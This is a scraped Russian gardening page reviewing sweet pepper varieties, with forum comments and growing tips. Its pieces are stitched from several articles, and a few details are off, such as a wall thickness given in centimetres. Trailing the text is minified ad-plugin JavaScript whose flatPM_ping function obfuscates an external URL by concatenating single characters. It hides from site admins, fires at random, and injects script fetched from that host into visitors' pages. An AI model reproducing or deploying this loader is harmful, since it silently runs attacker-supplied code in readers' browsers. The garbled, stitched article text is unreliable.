4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Лучшие семена сладкого перца отзывы

Какие сорта сладкого перца считаются лучшими

Перед тем, как сажать перец в открытый грунт, необходимо изучить особенности выращивания овоща. Для этого выбирают лучшие сорта сладкого перца: они хорошо растут без тепличного укрытия и дают крупные плоды.

Описание лучших сортов сладкого перца

Ранние сорта болгарского перца

Самые неприхотливые и стойкие виды перцев хорошо себя чувствуют вне теплицы. С растениями-неженками не стоит связываться: в незащищенном грунте их кусты медленно набирают растительную массу. Стоит обратить внимание на разновидности сладкого перца, которые приносят урожай за короткий срок.

Важное преимущество ранних сортов — их устойчивость к вирусным поражениям.

Когда кусты идут в рост, производят подкормку, иначе плоды болгарского вырастают некрупными. В качестве подкормки для плодоносящих растений используют разбавленный раствор коровьего навоза.

Биг Мама

Растение способно без стресса переносить прохладную температуру. На открытом участке кусты вырастают в высоту на 50-70 см. Средний срок созревания перцев — 100 дней.

С 1 кв. м насаждений огородник получает 7-8 кг сладких плодов оранжевого цвета. Перцы мясистые, крупные. Биг Мама — лучший вариант для фаршировки.

Купец

Этот сорт был создан специально для выращивания в прохладных регионах, например, в условиях Подмосковья. Урожай можно получить через 100 дней после высаживания семян. Сочные ярко-красные перцы по форме напоминают конус. Плоды без проблем переносят транспортировку, долго хранятся и не портятся.

Кусты сорта Купец растут дружнее и приносят лучший урожай, если разведены рассадой в условиях дома или квартиры. Высаживать рассаду в огороде желательно, если на улице установилась теплая весенняя погода. На открытом участке всхожесть семян невысокая.

Среднеспелые сорта болгарского перца

Среднеспелые культуры плодоносят долго. Получить с куста сладкий перец в условиях умеренной температуры можно через 130-140 дней после появления ростков.

Лучшие среднеспелые сорта сладкого перца стойки к вредителям.

Ласточка

Всхожесть семян сорта Ласточка отличная. Кусты нуждаются в подвязывании, т.к. они достаточно высокие. Овощная культура устойчива к заболеваниям. Растение комфортно себя чувствует в незащищенном грунте. Плоды имеют форму конуса.

Цвет незрелых плодов салатовый, цвет спелых — красный. Масса плода — около 100 г.

Атлант

Со дня появления первых всходов до сбора урожая проходит 140 дней. Форма куста штамбовая. На 1 кв. м приходится 4 кг плодов. Этот сорт перца приносит щедрый урожай, если рассаду начали выращивать в конце февраля.

Подросшую рассаду, высаженную в открытый грунт, обильно не поливают, но растение не любит и пересыхания. Перцы красного цвета отличаются плотностью, сочностью.

Позднеспелые сорта болгарского перца

Плоды болгарского перца хороши для салатов

Особая ценность семян поздних сортов заключается в том, что лакомиться плодами можно до середины октября.

Геракл

Выносливый сорт, обладающий значительным периодом вегетации, поэтому рассаду готовят заранее. Начало марта — крайний срок для посева рассады. Кусты низкие, раскидистые. Листья темно-зеленые, слегка морщинистые.

Дачник может собирать урожай с кустов через 130 суток. Сочные, ароматные овощи имеют форму куба. Насыщенный красный цвет свидетельствует об их спелости. Плоды хороши в салатах, подходят для консервации.

Желтый колокол

Чтобы выращивать перец под открытым небом, рассаду в грунт высаживают в конце мая, а сеют в марте.

Листвы на кустах Желтого колокола немного. Сорт устойчив к вирусу табачной мозаики и перепадам температур. Спелые плоды окрашены в желтый. Полное созревание перцев наступает на 150-160 сутки. Их используют для салатов, овощных рагу.

Богатырь

Богатырь — сладкий позднеспелый сорт. Мощный раскидистый куст нетребователен к поливу. Сорт устойчив к вершинной гнили, табачной мозаике. Со дня высаживания семян до спелости проходит 4 месяца.

  • хороший рост в незащищенном грунте;
  • способность культуры выдерживать загущение;
  • внушительный вес плодов (160 г);
  • урожайность: с 1 кв. м собирают 6-7 кг плодов;
  • при транспортировке качество перцев не снижается.

Зефир

Зефир — один из самых интересных сортов болгарского перца. Кусты растения раскидистые, сильные. Их можно не подвязывать. Темно-зеленый перец похож на шар. При окончательной спелости плод становится красным. Его средний вес — 160 г. Мякоть вкусная, ароматная. Сорт Зефир комфортно себя чувствует под пленочным укрытием.

Гибриды

Гибридные сорта порадуют вас крупными плодами

Гибриды обладают стойкостью к растительным заболеванием и крупными плодами. Семена гибридных культур не годятся для следующей посадки.

Маринкин язычок

Марьин язычок — вариант для любителей массивных перцев. Растение стойко переносит нестабильные погодные условия. Куст необходимо подвязывать, т.к. от тяжести урожая он может упасть.

Форма перцев напоминает язык. Они окрашены в цвет темной вишни. Плоды обладают приятным сладким вкусом и сочностью.

Тритон

Этот гибрид устойчив к прохладной погоде, сырости, ветру. При посадке рассады в грунт первую завязь на кустах удаляют. Это условие необходимо, чтобы куст хорошо развивался.

С одного куста снимают 45-50 плодов. На стадии технической спелости плоды желтые. Красными они становятся, когда созреют полностью.

Атлантик

Самые крупные плоды дает сорт Атлантик. Рассаду высаживают в середине марта. Семена заворачивают во влажную ткань и держат двое суток, чтобы обеспечить им хорошую всхожесть.

В последних числах мая рассаду можно высаживают на грядки. Куст высокий, крепкий. Расстояние между двумя кустами не должно быть меньше 40 см. Плоды массивные, сочные, созревают через 3 месяца после появления первых зеленых росточков. Мякоть вкусная, ароматная.

Толстостенные крупноплодные сорта

Рассмотрим лучшие толстостенные сорта сладкого перца.

Белое золото

Этот ранний сорт прославился плодами очень больших размеров. Подготовкой рассады лучше заняться уже в феврале. Растение нуждается в частом поливе. Кусты крепкие, с ярко-зелеными листьями.

Растение нужно подкармливать, но злоупотреблять удобрениями нельзя. Масса перцев составляет от 270 до 450 г. Золотистый цвет и приятный вкус плодов делают сорт незаменимым. Его часто выращивают на продажу.

Сибирский формат

Посев на рассаду рекомендуют производить за 2 месяца до высадки перца на постоянное место. На плодородных почвах кусты быстро набирают растительную массу и формируют мясистые плоды.

Масса плодов — 400 г. Толщина стенки равна 10 мм. С одного куста собирают не меньше 10 перцев. Вкус и запах мякоти нежный.

Полив растений дождевой водой увеличивает шансы на получения большого урожая.

Какие сорта сладкого болгарского перца Вы выращиваете?

Сейчас самое время определиться с сортами и приготовить семена перцев, которые будем сажать. Поделитесь пожалуйста, у Вас есть любимые урожайные, устойчивые сорта?

[/img]

Особенно важен возраст рассады. Наилучшие результаты дает 80-90-дневная рассада. 60-дневная рассада даст урожай уже в два раза меньший. У нас рассада высаживается в грунт в середине мая, следовательно, сеять семена надо в середине февраля.

[/img] Сорт Красный великан.
Рейтинг: +16
ИринаУ
25 января 2012 года 1 3461 30
HTML-код:
BB-код для форумов:

Как это будет выглядеть?

Diets.ru → Какие сорта сладкого болгарского перца Вы выращиваете?

Сейчас самое время определиться с сортами и приготовить семена перцев, которые будем сажать. Поделитесь пожалуйста, у Вас есть любимые урожайные, устойчивые сорта?
[/img]
Особенно важен возраст рассады. Наилучшие результаты дает 80-90-дневная рассада. 60-дневная рассада даст урожай уже в два раза меньший. Читать полностью

Дневник группы «Я и моя дача»:

Наташенька,попробуй еще разок,это не трудно.Перцы выращивать просто. Зато,как приятно летом сделать ароматный салатик с грядки!

Вот несколько советов.

Посевы всходят при Т=20-222 гр. до двух недель.Как только покажутся первые петельки всходов,поставить ящик на подоконник к свету,но подальше от стекла.

Рассада-самое главное.Она должна быть крепкой и уже с завязями при высадке в грунт.Стебель толщиной с карандаш.

Я высаживаю из рассадного ящика в пластиковые 400-гр стаканы,этого достаточно.На дно каждого стакана кладу ложку песка с золой.

Перцы не любят мочить ноги.Поливать очень умеренно,только под корень отстоянной теплой водой без всяких удобрений.

Штук 20 плодов с детский кулачок.

В каждом году-разные факторы,которые влияют на растения.У нас в этом году было изобилие перцев,раздавала всем знакомым,замучалась перерабатывать и морозить,а 2 года назад,хотя и рассада была прекрасной,еле-еле себе хватило.Чем объяснить ?

А вот помидоры каждый год удаются.Они опыляются между собой,все сорта-устойчивые и не болеют ,слава Богу!

Когда-то мы сажали томаты таких сортов :Малиновый гигант,Ожаровский,Де-Барао разных окрасок,Чудо света,Гибрид Тарасенко..

Потом путем многолетнего отбора лучших представителей,переопыляя между собой ,получили свои собственные сорта и выращиваем теперь только из своих семян.

Остались : Ранняя любовь,Фатима,Санька.

Из наших полученых : Розовый сахарный( до !,5 кг)

Красный салатный ( до 1 кг)

Красная сосулька ( до 500 гр)

Сливки и каплевидные- для консервирования.

Все эти сорта получились крупнее своих прародителей и в банке не очень удобны,поэтому я купила два года назад на рынке помидорки » Чумак» и буду теперь бороться за не большую массу.

Все помидоры получились сладкими и не требуют в консервации много сахара.Фитофторой могут некоторые заболеть в очень мокрый холодный год.

У плодоножки не большое белое пятно- только у розовых салатных,но они такие вкусные и ароматные,что мы от них не отказываемся,просто выращиваем на отдельной грядке.

Самые лучшие семена перцев

Выбирая лучший сорт перца на 2019 год, в первую очередь, нужно понимать, что не существует таких «волшебных» сортов, которые принесут гигантские урожаи без посторонней помощи. Залогом хорошего урожая всегда является труд человека. Современные агротехнические методы помогают добиться самых высоких результатов. Конечно, не последнюю роль играет и семенной материал – чем качественнее семена, тем обильнее и здоровее будут всходы.

На вопрос: «Какой перец лучше?» нет однозначного ответа. И все-таки мы попробуем назвать лучшие сорта перца на 2019 год, исходя из неприхотливости, урожайности и стойкости растений. А также расскажем о правилах выращивания разных сортов этой капризной и теплолюбивой культуры.

Польза болгарского перца

В летний день иметь под рукой грядки со свежим сладким перцем – владеть доступом к источнику всех необходимых витаминов. В желтых и красных плодах болгарского перца содержится огромное количество витамина С . В перце его даже больше, чем в черной смородине и лимоне.

Еще один очень полезный элемент – рутин, или витамин Р . Совместно с витамином С этот компонент способствует укреплению стенок сосудов, снижает их проницаемость и хрупкость.

Ряд витаминов группы В поможет справиться с бессонницей, слабостью и депрессией. А также будет полезен для людей, страдающих сахарным диабетом и отеками.

Как ни странно, но витамина А в болгарском перце даже больше, чем в моркови. А ведь этот витамин возвращает красоту волосам и ногтям, способствует улучшению кожи, укрепляет зрение.

Болгарский перец хорош во многих блюдах, его можно консервировать и мариновать, но полезнее всего свежие овощи. Перец в салатах и закусках обеспечит организм дневной дозой всех необходимых микроэлементов и витаминов.

Правила ухода за перцем

Отзывы огородников, выращивающих перец не один год, свидетельствуют о том, что это не так уж и сложно. Для получения большого урожая нужно приложить немного усилий и проявить терпение.

Перец имеет достаточно длительный период вегетации – от 80 до 130 дней. Даже на юге России культура не успеет вызреть, если сажать перец семенами в грунт. Чтобы растения хорошо цвели и быстро росли, их лучше высаживать рассадным способом.

Основные правила выращивания болгарского перца выглядят так :

  1. Участок выбирают с осени – это должно быть хорошо освещенное солнцем и защищенное от ветра место.
  2. Почву перцы любят рыхлую, насыщенную кислородом. Поэтому, если земля на участке глинистая, ее нужно размешать с перепревшими опилками, золой, торфом.
  3. Надежнее всего выращивать теплолюбивые перцы в укрытии. Если теплицы на участке нет, подойдут и обычные грядки. Если есть возможность, над грядками нужно установить дуги, на ночь растения накрывать полиэтиленом или агроволокном. Предпочтительно укрывать рассаду на ночное время до 15 июня, в последующие дни можно приподнимать края пленки, но не убирать ее полностью.
  4. Ветки перца очень хрупкие, а корни находятся близко к поверхности земли. Поэтому вместе с высадкой рассады необходимо вставлять около каждого саженца деревянный колышек. Когда куст будет расти, его нужно подвязывать, чтобы сохранить целостность побегов.
  5. Семена на рассаду лучше сеять сразу в индивидуальные емкости – перец не любит пересадки, его лучше не пикировать. Высаживая растения на постоянное место, лучше разрезать стаканчики, чтобы перенести кустик вместе с земляным комом.
  6. После пересадки перец не нужно поливать около пяти дней, достаточно регулярного рыхления почвы. В первые две недели рассада будет ослабленной и болезненной, лишняя влажность ей не нужна.
  7. За весь сезон растения нужно подкормить не менее трех раз. Это делают в момент цветения и в период созревания плодов.
  8. Поливают перец только теплой водой. Холодная вода приведет к угнетению роста кустов и сбрасыванию завязей. Лучше всего использовать отстоянную воду.
  9. До периода цветения перец поливают методом дождевания – из лейки разбрызгивают воду по всему кусту. В период формирования и созревания плодов поливать кусты нужно под корень.
  10. Следует постоянно пушить почву на глубину около 5 см. Корням перца нужен воздух.

Лучшие сорта перцев

Перечисленные ниже сорта отобраны по нескольким факторам :

  • урожайности;
  • качеству плодов;
  • неприхотливости в уходе;
  • стойкости к заболеваниям и вирусам.

По фото и описанию легко можно выбрать подходящий для каждого конкретного случая сорт на 2019 год.

Еще важно помнить, что покупают семена перцев лучшие огородники только у проверенных производителей . Из негибридных плодов семена можно собрать самостоятельно. Для этого выбирают самые красивые, имеющие правильную форму и равномерный окрас перцы. На них осторожно надрезают верхушку и вытягивают семенник. В таком виде оставляют сушиться на 3-4 дня при температуре 20-25 градусов. После этого семена складывают в бумажный пакетик.

«Князь Серебряный»

Сорт относится к раннеспелым, плоды созревают к 100-му дню после высадки семян. Для рассады семена сеют в конце февраля или в первой половине марта. Саженцы можно переносить в теплицу к середине мая, а в открытый грунт перец высаживают, только когда установится постоянное тепло. Ночью не должно быть заморозков, а земля должна прогреться как минимум до десяти градусов.

Перцы имеют коническую форму, небольшие размеры. Масса одного перчика не превышает 100 грамм. В стадии технической зрелости плод этого сорта окрашен в желтый цвет, после полного созревания становится красным.

Толщина стенок овоща достигает 6,5 мм, что делает его сочным и вкусным. Перцы этого сорта можно перерабатывать, консервировать, фаршировать, добавлять в салаты и другие блюда.

Сорт защищен от большинства болезней. Приносит высокие урожаи – с каждого кустика (высота до 65 см) можно снять около 2,5 кг зрелых плодов.

«Геракл»

Этот сорт относится к среднеспелым, поэтому подходит для выращивания на всей территории России. Семена на рассаду сеют в середине марта, а в грунт саженцы переносят после наступления постоянного тепла (во второй половине мая).

Кусты раскидистые, высота их небольшая – 40-60 см. Сорт подходит для выращивания как в пленочной теплице, так и на открытой грядке. От ночных холодов рассаду лучше прикрывать пленкой.

Сами перцы имеют форму куба, достаточно крупные – масса одного может достигать 300 грамм. В стадии технического созревания перец сорта «Геракл» окрашен в ярко-зеленый цвет, после биологической зрелости становится ярко-красным.

Толщина стенок овоща составляет до 5,5 см, мякоть у него сочная и очень ароматная. Этот сорт хорош в салатах, закусках, его можно фаршировать и консервировать.

Растение устойчиво к целому ряду заболеваний. С каждого куста можно снять до 3 кг перцев.

«Арсенал»

Сорт со средними сроками созревания. Подходит для выращивания в любых теплицах, а также в открытом грунте. На рассаду семена высевают после 15-го марта, переносят растения на постоянное место к середине мая. Сроки высадки сорта в открытый грунт зависят от климатических особенностей региона – делать это нужно, лишь когда установится тепло и пройдет угроза заморозков.

Плоды имеют стандартную для сладкого перца, коническую форму. Их размер средний – масса каждого не превышает 120 грамм. Сначала перцы окрашены в зеленый цвет, после полного созревания становятся красными. Толщина стенок сорта составляет около 5 мм.

Кустики невысокие – от 35 до 70 см. При достаточном поливе и правильном уходе с каждого куста сорта «Арсенал» можно получить больше двух килограммов плодов.

«Воловье ухо»

К среднеспелым сортам можно отнести и этот перец, ведь плоды его зреют на 110-ый день после высадки семян.

Кусты вырастают средними – их высота колеблется от 60 до 80 см. Поэтому побеги лучше подвязывать, чтобы ветки с плодами не обломились. Форма плода – удлиненный конус. Поверхность гладкая и блестящая. Изначально перцы окрашены в темно-зеленый цвет, к наступлению биологической зрелости становятся красными.

Часто масса плодов не превышает 140 граммов, но при правильном уходе можно вырастить и 220-тиграммовые перцы этого сорта. Стенки толстые – до 5,5 мм, мякоть сочная и очень вкусная.

Отличительная черта сорта – возможность длительного хранения. Еще один плюс сорта – высокая урожайность (до 3 кг плодов с каждого квадратного метра).

«Подарок Молдовы»

Этот перец, наверное, знаком каждому огороднику. Сорт относится к среднеспелым, отличается своей приспособленностью – культуру успешно можно выращивать в регионах с различными климатическими условиями.

Также неприхотлив сорт и к составу почвы – его можно выращивать и на песчаных, и на черноземных, и даже на глинистых грунтах. Сорт дает стабильно высокие урожаи, защищен от самых опасных болезней, подходит для высадки в открытый грунт или в любую теплицу.

Именно поэтому сорт «Подарок Молдовы» часто культивируют на полях и больших огородах. Он отлично подходит для продажи: долго хранится, имеет красивый внешний вид и отменные вкусовые качества.

Плоды этого сорта имеют конусовидную форму и средние размеры. Масса каждого овоща не превышает 100 грамм, зато стенки у него очень толстые – около 7 мм. Мякоть плода хрустящая, сочная и очень ароматная. Этому перцу свойственен свой, неповторимый вкус.

Отзыв о перце «Подарок Молдовы»

«Полтавский»

Сорт, проверенный временем и тысячами огородников, легко попадает в категорию лучших на 2019 год.

Компактные кустики этого сорта достигают высоты в 70 см, нуждаются в подвязывании. Культуру можно выращивать и в теплице, и в открытом грунте. Растение отличается устойчивостью к холоду и длительным периодом плодоношения.

Даже в самых суровых климатических условиях сорт дает стабильные урожаи – среднего размера перчики, масса которых не превышает 120 грамм. Толщина стенок у овоща больше 5 мм, что делает его сочным и аппетитным. Цвет плодов поначалу зеленый, позже перцы становятся красными. Внутри овоща четыре камеры с семенами, которые можно смело собирать для выращивания следующих урожаев.

Перцы сорта «Полтавский» универсальны: подходят для приготовления салатов, различных блюд, фарширования и консервирования.

Плоды формируются одновременно и быстро созревают. Растение плодоносит в течение 100 дней. Культура не боится вершинной гнили, вертициллеза, ночных заморозков. Овощи этого сорта считаются одними из самых лежких – перцы могут храниться около трех месяцев.

«Лумина»

На 115-ый день после высадки семян можно пробовать плоды сорта «Лумина». Этот болгарский перец давно известен огородникам и дачникам, чаще всего, сорт выращивают на юге страны.

Культура так же подходит для культивирования в тепличных условиях. Растение считается стойким к большинству вирусов и болезней. Кустики вырастают компактными – в высоту до 60 см.

Плоды имеют форму конуса и необычный окрас – в стадии технической зрелости они бледно-золотистые с молочным отливом. После наступления биологической спелости становятся ярко-красными.

Средняя масса перцев составляет около 110 грамм. Стенки у них толстые – до 5 мм. Вкус этого овоща не спутаешь ни с чем – перец сорта «Лумина» имеет свой, ярко выраженный, аромат.

Еще одно достоинство – возможность транспортировки и длительного хранения. Этот сорт относится к самым продаваемым.

«Оранжевое чудо»

Этими прекрасными плодами можно полакомиться уже через 95 дней после того, как были посеяны семена на рассаду. Отличительная черта сорта – ярко-оранжевый оттенок овощей. Такие перцы отлично смотрятся в салатах и закатках, вкусны в свежем виде и различных блюдах.

Кусты данного сорта достаточно высокие – больше метра. Их обязательно нужно подвязывать, выращивать лучше в теплице или на защищенной от ветра грядке.

Плоды очень крупные – масса каждого превышает 250-300 грамм, а длина – 12 см. Форма овоща – кубовидная, стенки толстые – до 7 мм.

Растение устойчиво к целому ряду болезней и вирусов, сорт может выращиваться в любом регионе страны.

«Калифорнийское чудо»

Этот среднеспелый сорт известен во всем мире – его выращивают не только отечественные огородники. Первые зрелые плоды появляются лишь на 125-ый день после высадки семян. Поэтому выращивать «Калифорнийское чудо» лучше рассадным способом в теплице. Но можно культивировать его и на обычных грядках, на ночь накрывая растения пленкой.

Перцы разделены на 3-4 камеры, имеют форму куба. Масса каждого достигает 180 грамм – перец достаточно крупный. Стенки имеют толщину около 7 мм. Мякоть сочная, ароматная, с непревзойденным вкусом паприки.

Зрелые овощи окрашены в темно-зеленый цвет, затем становятся красными или желтыми (есть две разновидности сорта).

На каждом кустике завязывается где-то 5-6 перцев, что позволяет получить около 1,2 килограмм урожая с одного растения.

Растение устойчиво к вертициллезу. Любят сорт за его неприхотливость и отменные вкусовые качества.

Что поможет получить высокий урожай перца

Нет такого «зелья», которое сделает кусты перца плодородными и стойкими. Этому капризному растению нужен регулярный уход, перец не та культура, которую можно «проведывать» лишь на выходных.

Кроме ряда болезней и вирусов, растениям угрожают вредители, их необходимо вовремя обнаружить и устранить. Все это требует времени хозяина и его труда. Зато, если за перцем хорошо ухаживать, он подарит целый кладезь витаминов и полезных микроэлементов, поможет укрепить здоровье и просто насладиться непревзойденным вкусом.

Из рейтинга на 2019 год смело можно выбрать любой сорт, все они достойны внимания аграриев и, по праву, считаются лучшими семенами перцев. Чтобы получить красочное ассорти в банках и на тарелках, выбирайте разноцветные сорта болгарского перца.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};